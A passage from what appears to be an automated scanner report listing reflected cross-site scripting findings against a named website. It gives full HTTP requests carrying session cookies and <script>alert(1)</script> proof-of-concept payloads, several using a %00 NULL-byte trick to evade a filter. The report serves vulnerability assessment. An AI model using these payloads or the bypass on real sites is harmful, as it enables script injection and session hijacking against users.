Cookie: JSESSIONID=0176481C872BB3F105D47E53A4B62BBB; __utmv=; use_yf=false; __utmz=179270819.1289829501.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; state=1-1289829533228-0-4133; ref=687474703a2f2f7366776b2e6f72672f436f6d6d756e6974792f5365616d496e50726f64756374696f6e; tc=H4sIAAAAAAAAAKWPzW6DMBCEz8lTWHsvGNsQU+G8CuJnQywZTO0lNG9fR1FP6SFSTyvNzDeabWhg02bH1mEX0cBHVelaclXKujopKbTWHJ6J2Ud6BEQhZXWqlNKiKDnnUgEbAnaEo4FC6FqLupRSiBOw1SbNLoRh6Rywiw2R2i04A1ei9TPP933PbnZE3/vvbPBz3iN1eR/8HjGL2M2/0NeG4W5g2VzqsbF9qlebJl06FxHYDYMBke64GABGyeFwPh4ODQ3tmGqtY3Rf05NFcu2ML2tTrfPT9PiDwoaQ/0mrF1qVvHyXlv+ixfvLm5yG8/EHKBR/jeABAAA-; WRUID=0; partner=internal; __utma=179270819.596561490.1289829501.1289829501.1289829501.1; __utmc=179270819; __utmb=179270819.1.10.1289829501; use_gf=false;

Response

HTTP/1.0 404 Not Found
Server: BigIP
Connection: close
Content-Length: 370

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <code>/beta/support322d5<script>alert(1)</script>3a8d2ee99e8/home.seam</code>
...[SNIP]...

4.598. http://www.videobox.com/beta/support/home.seam [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videobox.com
Path:   /beta/support/home.seam

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload %00619fa<script>alert(1)</script>2ca81ef01a3 was submitted in the REST URL parameter 3. This input was echoed as 619fa<script>alert(1)</script>2ca81ef01a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /beta/support/home.seam%00619fa<script>alert(1)</script>2ca81ef01a3 HTTP/1.1
Host: www.videobox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0176481C872BB3F105D47E53A4B62BBB; __utmv=; use_yf=false; __utmz=179270819.1289829501.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; state=1-1289829533228-0-4133; ref=687474703a2f2f7366776b2e6f72672f436f6d6d756e6974792f5365616d496e50726f64756374696f6e; tc=H4sIAAAAAAAAAKWPzW6DMBCEz8lTWHsvGNsQU+G8CuJnQywZTO0lNG9fR1FP6SFSTyvNzDeabWhg02bH1mEX0cBHVelaclXKujopKbTWHJ6J2Ud6BEQhZXWqlNKiKDnnUgEbAnaEo4FC6FqLupRSiBOw1SbNLoRh6Rywiw2R2i04A1ei9TPP933PbnZE3/vvbPBz3iN1eR/8HjGL2M2/0NeG4W5g2VzqsbF9qlebJl06FxHYDYMBke64GABGyeFwPh4ODQ3tmGqtY3Rf05NFcu2ML2tTrfPT9PiDwoaQ/0mrF1qVvHyXlv+ixfvLm5yG8/EHKBR/jeABAAA-; WRUID=0; partner=internal; __utma=179270819.596561490.1289829501.1289829501.1289829501.1; __utmc=179270819; __utmb=179270819.1.10.1289829501; use_gf=false;

Response

HTTP/1.0 404 Not Found
Server: BigIP
Connection: close
Content-Length: 373

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <code>/beta/support/home.seam%00619fa<script>alert(1)</script>2ca81ef01a3</code>
...[SNIP]...

4.599. http://www.videobox.com/beta/tos.seam [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videobox.com
Path:   /beta/tos.seam

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1f470<script>alert(1)</script>2b1aeee5499 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beta1f470<script>alert(1)</script>2b1aeee5499/tos.seam HTTP/1.1
Host: www.videobox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0176481C872BB3F105D47E53A4B62BBB; __utmv=; use_yf=false; __utmz=179270819.1289829501.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; state=1-1289829533228-0-4133; ref=687474703a2f2f7366776b2e6f72672f436f6d6d756e6974792f5365616d496e50726f64756374696f6e; tc=H4sIAAAAAAAAAKWPzW6DMBCEz8lTWHsvGNsQU+G8CuJnQywZTO0lNG9fR1FP6SFSTyvNzDeabWhg02bH1mEX0cBHVelaclXKujopKbTWHJ6J2Ud6BEQhZXWqlNKiKDnnUgEbAnaEo4FC6FqLupRSiBOw1SbNLoRh6Rywiw2R2i04A1ei9TPP933PbnZE3/vvbPBz3iN1eR/8HjGL2M2/0NeG4W5g2VzqsbF9qlebJl06FxHYDYMBke64GABGyeFwPh4ODQ3tmGqtY3Rf05NFcu2ML2tTrfPT9PiDwoaQ/0mrF1qVvHyXlv+ixfvLm5yG8/EHKBR/jeABAAA-; WRUID=0; partner=internal; __utma=179270819.596561490.1289829501.1289829501.1289829501.1; __utmc=179270819; __utmb=179270819.1.10.1289829501; use_gf=false;

Response

HTTP/1.0 404 Not Found
Server: BigIP
Connection: close
Content-Length: 361

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <code>/beta1f470<script>alert(1)</script>2b1aeee5499/tos.seam</code>
...[SNIP]...

4.600. http://www.videobox.com/beta/tos.seam [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videobox.com
Path:   /beta/tos.seam

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload %00a15e5<script>alert(1)</script>02d6be2ebf4 was submitted in the REST URL parameter 2. This input was echoed as a15e5<script>alert(1)</script>02d6be2ebf4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /beta/tos.seam%00a15e5<script>alert(1)</script>02d6be2ebf4 HTTP/1.1
Host: www.videobox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0176481C872BB3F105D47E53A4B62BBB; __utmv=; use_yf=false; __utmz=179270819.1289829501.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; state=1-1289829533228-0-4133; ref=687474703a2f2f7366776b2e6f72672f436f6d6d756e6974792f5365616d496e50726f64756374696f6e; tc=H4sIAAAAAAAAAKWPzW6DMBCEz8lTWHsvGNsQU+G8CuJnQywZTO0lNG9fR1FP6SFSTyvNzDeabWhg02bH1mEX0cBHVelaclXKujopKbTWHJ6J2Ud6BEQhZXWqlNKiKDnnUgEbAnaEo4FC6FqLupRSiBOw1SbNLoRh6Rywiw2R2i04A1ei9TPP933PbnZE3/vvbPBz3iN1eR/8HjGL2M2/0NeG4W5g2VzqsbF9qlebJl06FxHYDYMBke64GABGyeFwPh4ODQ3tmGqtY3Rf05NFcu2ML2tTrfPT9PiDwoaQ/0mrF1qVvHyXlv+ixfvLm5yG8/EHKBR/jeABAAA-; WRUID=0; partner=internal; __utma=179270819.596561490.1289829501.1289829501.1289829501.1; __utmc=179270819; __utmb=179270819.1.10.1289829501; use_gf=false;

Response

HTTP/1.0 404 Not Found
Server: BigIP
Connection: close
Content-Length: 364

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <code>/beta/tos.seam%00a15e5<script>alert(1)</script>02d6be2ebf4</code>
...[SNIP]...

4.601. http://www.videobox.com/beta/tour/browse.seam [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videobox.com
Path:   /beta/tour/browse.seam

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a7e75<script>alert(1)</script>6d4e9c5db5a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /betaa7e75<script>alert(1)</script>6d4e9c5db5a/tour/browse.seam HTTP/1.1
Host: www.videobox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0176481C872BB3F105D47E53A4B62BBB; __utmv=; use_yf=false; __utmz=179270819.1289829501.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; state=1-1289829533228-0-4133; ref=687474703a2f2f7366776b2e6f72672f436f6d6d756e6974792f5365616d496e50726f64756374696f6e; tc=H4sIAAAAAAAAAKWPzW6DMBCEz8lTWHsvGNsQU+G8CuJnQywZTO0lNG9fR1FP6SFSTyvNzDeabWhg02bH1mEX0cBHVelaclXKujopKbTWHJ6J2Ud6BEQhZXWqlNKiKDnnUgEbAnaEo4FC6FqLupRSiBOw1SbNLoRh6Rywiw2R2i04A1ei9TPP933PbnZE3/vvbPBz3iN1eR/8HjGL2M2/0NeG4W5g2VzqsbF9qlebJl06FxHYDYMBke64GABGyeFwPh4ODQ3tmGqtY3Rf05NFcu2ML2tTrfPT9PiDwoaQ/0mrF1qVvHyXlv+ixfvLm5yG8/EHKBR/jeABAAA-; WRUID=0; partner=internal; __utma=179270819.596561490.1289829501.1289829501.1289829501.1; __utmc=179270819; __utmb=179270819.1.10.1289829501; use_gf=false;

Response

HTTP/1.0 404 Not Found
Server: BigIP
Connection: close
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <code>/betaa7e75<script>alert(1)</script>6d4e9c5db5a/tour/browse.seam</code>
...[SNIP]...

4.602. http://www.videobox.com/beta/tour/browse.seam [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videobox.com
Path:   /beta/tour/browse.seam

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1f259<script>alert(1)</script>9a84c6635de was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beta/tour1f259<script>alert(1)</script>9a84c6635de/browse.seam HTTP/1.1
Host: www.videobox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0176481C872BB3F105D47E53A4B62BBB; __utmv=; use_yf=false; __utmz=179270819.1289829501.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; state=1-1289829533228-0-4133; ref=687474703a2f2f7366776b2e6f72672f436f6d6d756e6974792f5365616d496e50726f64756374696f6e; tc=H4sIAAAAAAAAAKWPzW6DMBCEz8lTWHsvGNsQU+G8CuJnQywZTO0lNG9fR1FP6SFSTyvNzDeabWhg02bH1mEX0cBHVelaclXKujopKbTWHJ6J2Ud6BEQhZXWqlNKiKDnnUgEbAnaEo4FC6FqLupRSiBOw1SbNLoRh6Rywiw2R2i04A1ei9TPP933PbnZE3/vvbPBz3iN1eR/8HjGL2M2/0NeG4W5g2VzqsbF9qlebJl06FxHYDYMBke64GABGyeFwPh4ODQ3tmGqtY3Rf05NFcu2ML2tTrfPT9PiDwoaQ/0mrF1qVvHyXlv+ixfvLm5yG8/EHKBR/jeABAAA-; WRUID=0; partner=internal; __utma=179270819.596561490.1289829501.1289829501.1289829501.1; __utmc=179270819; __utmb=179270819.1.10.1289829501; use_gf=false;

Response

HTTP/1.0 404 Not Found
Server: BigIP
Connection: close
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <code>/beta/tour1f259<script>alert(1)</script>9a84c6635de/browse.seam</code>
...[SNIP]...

4.603. http://www.videobox.com/beta/tour/browse.seam [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videobox.com
Path:   /beta/tour/browse.seam

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload %0086967<script>alert(1)</script>cbb10574d6d was submitted in the REST URL parameter 3. This input was echoed as 86967<script>alert(1)</script>cbb10574d6d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /beta/tour/browse.seam%0086967<script>alert(1)</script>cbb10574d6d HTTP/1.1
Host: www.videobox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0176481C872BB3F105D47E53A4B62BBB; __utmv=; use_yf=false; __utmz=179270819.1289829501.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; state=1-1289829533228-0-4133; ref=687474703a2f2f7366776b2e6f72672f436f6d6d756e6974792f5365616d496e50726f64756374696f6e; tc=H4sIAAAAAAAAAKWPzW6DMBCEz8lTWHsvGNsQU+G8CuJnQywZTO0lNG9fR1FP6SFSTyvNzDeabWhg02bH1mEX0cBHVelaclXKujopKbTWHJ6J2Ud6BEQhZXWqlNKiKDnnUgEbAnaEo4FC6FqLupRSiBOw1SbNLoRh6Rywiw2R2i04A1ei9TPP933PbnZE3/vvbPBz3iN1eR/8HjGL2M2/0NeG4W5g2VzqsbF9qlebJl06FxHYDYMBke64GABGyeFwPh4ODQ3tmGqtY3Rf05NFcu2ML2tTrfPT9PiDwoaQ/0mrF1qVvHyXlv+ixfvLm5yG8/EHKBR/jeABAAA-; WRUID=0; partner=internal; __utma=179270819.596561490.1289829501.1289829501.1289829501.1; __utmc=179270819; __utmb=179270819.1.10.1289829501; use_gf=false;

Response

HTTP/1.0 404 Not Found
Server: BigIP
Connection: close
Content-Length: 372

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <code>/beta/tour/browse.seam%0086967<script>alert(1)</script>cbb10574d6d</code>
...[SNIP]...

4.604. http://www.videobox.com/beta/tour/flash.seam [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videobox.com
Path:   /beta/tour/flash.seam

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6a62b<script>alert(1)</script>15d69159454 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beta6a62b<script>alert(1)</script>15d69159454/tour/flash.seam?subTab=home&thumbsOffset=0&raId=-1&cid=2011462&mainTab=browse&offsetTime=&contentId=64677931 HTTP/1.1
Host: www.videobox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0176481C872BB3F105D47E53A4B62BBB; __utmv=; use_yf=false; __utmz=179270819.1289829501.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; state=1-1289829533228-0-4133; ref=687474703a2f2f7366776b2e6f72672f436f6d6d756e6974792f5365616d496e50726f64756374696f6e; tc=H4sIAAAAAAAAAKWPzW6DMBCEz8lTWHsvGNsQU+G8CuJnQywZTO0lNG9fR1FP6SFSTyvNzDeabWhg02bH1mEX0cBHVelaclXKujopKbTWHJ6J2Ud6BEQhZXWqlNKiKDnnUgEbAnaEo4FC6FqLupRSiBOw1SbNLoRh6Rywiw2R2i04A1ei9TPP933PbnZE3/vvbPBz3iN1eR/8HjGL2M2/0NeG4W5g2VzqsbF9qlebJl06FxHYDYMBke64GABGyeFwPh4ODQ3tmGqtY3Rf05NFcu2ML2tTrfPT9PiDwoaQ/0mrF1qVvHyXlv+ixfvLm5yG8/EHKBR/jeABAAA-; WRUID=0; partner=internal; __utma=179270819.596561490.1289829501.1289829501.1289829501.1; __utmc=179270819; __utmb=179270819.1.10.1289829501; use_gf=false;

Response

HTTP/1.0 404 Not Found
Server: BigIP
Connection: close
Content-Length: 461

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <code>/beta6a62b<script>alert(1)</script>15d69159454/tour/flash.seam?subTab=home&thumbsOffset=0&raId=-1&cid=2011462&mainTab=browse&offsetTime=&contentId=64677931</code>
...[SNIP]...

4.605. http://www.videobox.com/beta/tour/flash.seam [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videobox.com
Path:   /beta/tour/flash.seam

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 626c7<script>alert(1)</script>5404689ddf3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beta/tour626c7<script>alert(1)</script>5404689ddf3/flash.seam?subTab=home&thumbsOffset=0&raId=-1&cid=2011462&mainTab=browse&offsetTime=&contentId=64677931 HTTP/1.1
Host: www.videobox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0176481C872BB3F105D47E53A4B62BBB; __utmv=; use_yf=false; __utmz=179270819.1289829501.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; state=1-1289829533228-0-4133; ref=687474703a2f2f7366776b2e6f72672f436f6d6d756e6974792f5365616d496e50726f64756374696f6e; tc=H4sIAAAAAAAAAKWPzW6DMBCEz8lTWHsvGNsQU+G8CuJnQywZTO0lNG9fR1FP6SFSTyvNzDeabWhg02bH1mEX0cBHVelaclXKujopKbTWHJ6J2Ud6BEQhZXWqlNKiKDnnUgEbAnaEo4FC6FqLupRSiBOw1SbNLoRh6Rywiw2R2i04A1ei9TPP933PbnZE3/vvbPBz3iN1eR/8HjGL2M2/0NeG4W5g2VzqsbF9qlebJl06FxHYDYMBke64GABGyeFwPh4ODQ3tmGqtY3Rf05NFcu2ML2tTrfPT9PiDwoaQ/0mrF1qVvHyXlv+ixfvLm5yG8/EHKBR/jeABAAA-; WRUID=0; partner=internal; __utma=179270819.596561490.1289829501.1289829501.1289829501.1; __utmc=179270819; __utmb=179270819.1.10.1289829501; use_gf=false;

Response

HTTP/1.0 404 Not Found
Server: BigIP
Connection: close
Content-Length: 461

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <code>/beta/tour626c7<script>alert(1)</script>5404689ddf3/flash.seam?subTab=home&thumbsOffset=0&raId=-1&cid=2011462&mainTab=browse&offsetTime=&contentId=64677931</code>
...[SNIP]...

4.606. http://www.videobox.com/beta/tour/flash.seam [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videobox.com
Path:   /beta/tour/flash.seam

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload %0089e24<script>alert(1)</script>a5ac507c579 was submitted in the REST URL parameter 3. This input was echoed as 89e24<script>alert(1)</script>a5ac507c579 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /beta/tour/flash.seam%0089e24<script>alert(1)</script>a5ac507c579?subTab=home&thumbsOffset=0&raId=-1&cid=2011462&mainTab=browse&offsetTime=&contentId=64677931 HTTP/1.1
Host: www.videobox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0176481C872BB3F105D47E53A4B62BBB; __utmv=; use_yf=false; __utmz=179270819.1289829501.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; state=1-1289829533228-0-4133; ref=687474703a2f2f7366776b2e6f72672f436f6d6d756e6974792f5365616d496e50726f64756374696f6e; tc=H4sIAAAAAAAAAKWPzW6DMBCEz8lTWHsvGNsQU+G8CuJnQywZTO0lNG9fR1FP6SFSTyvNzDeabWhg02bH1mEX0cBHVelaclXKujopKbTWHJ6J2Ud6BEQhZXWqlNKiKDnnUgEbAnaEo4FC6FqLupRSiBOw1SbNLoRh6Rywiw2R2i04A1ei9TPP933PbnZE3/vvbPBz3iN1eR/8HjGL2M2/0NeG4W5g2VzqsbF9qlebJl06FxHYDYMBke64GABGyeFwPh4ODQ3tmGqtY3Rf05NFcu2ML2tTrfPT9PiDwoaQ/0mrF1qVvHyXlv+ixfvLm5yG8/EHKBR/jeABAAA-; WRUID=0; partner=internal; __utma=179270819.596561490.1289829501.1289829501.1289829501.1; __utmc=179270819; __utmb=179270819.1.10.1289829501; use_gf=false;

Response

HTTP/1.0 404 Not Found
Server: BigIP
Connection: close
Content-Length: 464

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <code>/beta/tour/flash.seam%0089e24<script>alert(1)</script>a5ac507c579?subTab=home&thumbsOffset=0&raId=-1&cid=2011462&mainTab=browse&offsetTime=&contentId=64677931</code>
...[SNIP]...

4.607. http://www.videobox.com/beta/tour/how_it_works.seam [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videobox.com
Path:   /beta/tour/how_it_works.seam

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d6801<script>alert(1)</script>dd6a9fca2b2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /betad6801<script>alert(1)</script>dd6a9fca2b2/tour/how_it_works.seam HTTP/1.1
Host: www.videobox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0176481C872BB3F105D47E53A4B62BBB; __utmv=; use_yf=false; __utmz=179270819.1289829501.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; state=1-1289829533228-0-4133; ref=687474703a2f2f7366776b2e6f72672f436f6d6d756e6974792f5365616d496e50726f64756374696f6e; tc=H4sIAAAAAAAAAKWPzW6DMBCEz8lTWHsvGNsQU+G8CuJnQywZTO0lNG9fR1FP6SFSTyvNzDeabWhg02bH1mEX0cBHVelaclXKujopKbTWHJ6J2Ud6BEQhZXWqlNKiKDnnUgEbAnaEo4FC6FqLupRSiBOw1SbNLoRh6Rywiw2R2i04A1ei9TPP933PbnZE3/vvbPBz3iN1eR/8HjGL2M2/0NeG4W5g2VzqsbF9qlebJl06FxHYDYMBke64GABGyeFwPh4ODQ3tmGqtY3Rf05NFcu2ML2tTrfPT9PiDwoaQ/0mrF1qVvHyXlv+ixfvLm5yG8/EHKBR/jeABAAA-; WRUID=0; partner=internal; __utma=179270819.596561490.1289829501.1289829501.1289829501.1; __utmc=179270819; __utmb=179270819.1.10.1289829501; use_gf=false;

Response

HTTP/1.0 404 Not Found
Server: BigIP
Connection: close
Content-Length: 375

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <code>/betad6801<script>alert(1)</script>dd6a9fca2b2/tour/how_it_works.seam</code>
...[SNIP]...

4.608. http://www.videobox.com/beta/tour/how_it_works.seam [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videobox.com
Path:   /beta/tour/how_it_works.seam

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 927f6<script>alert(1)</script>c306ea0c2bf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beta/tour927f6<script>alert(1)</script>c306ea0c2bf/how_it_works.seam HTTP/1.1
Host: www.videobox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0176481C872BB3F105D47E53A4B62BBB; __utmv=; use_yf=false; __utmz=179270819.1289829501.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; state=1-1289829533228-0-4133; ref=687474703a2f2f7366776b2e6f72672f436f6d6d756e6974792f5365616d496e50726f64756374696f6e; tc=H4sIAAAAAAAAAKWPzW6DMBCEz8lTWHsvGNsQU+G8CuJnQywZTO0lNG9fR1FP6SFSTyvNzDeabWhg02bH1mEX0cBHVelaclXKujopKbTWHJ6J2Ud6BEQhZXWqlNKiKDnnUgEbAnaEo4FC6FqLupRSiBOw1SbNLoRh6Rywiw2R2i04A1ei9TPP933PbnZE3/vvbPBz3iN1eR/8HjGL2M2/0NeG4W5g2VzqsbF9qlebJl06FxHYDYMBke64GABGyeFwPh4ODQ3tmGqtY3Rf05NFcu2ML2tTrfPT9PiDwoaQ/0mrF1qVvHyXlv+ixfvLm5yG8/EHKBR/jeABAAA-; WRUID=0; partner=internal; __utma=179270819.596561490.1289829501.1289829501.1289829501.1; __utmc=179270819; __utmb=179270819.1.10.1289829501; use_gf=false;

Response

HTTP/1.0 404 Not Found
Server: BigIP
Connection: close
Content-Length: 375

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <code>/beta/tour927f6<script>alert(1)</script>c306ea0c2bf/how_it_works.seam</code>
...[SNIP]...

4.609. http://www.videobox.com/beta/tour/how_it_works.seam [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videobox.com
Path:   /beta/tour/how_it_works.seam

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload %00129c6<script>alert(1)</script>20e470b2f16 was submitted in the REST URL parameter 3. This input was echoed as 129c6<script>alert(1)</script>20e470b2f16 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /beta/tour/how_it_works.seam%00129c6<script>alert(1)</script>20e470b2f16 HTTP/1.1
Host: www.videobox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
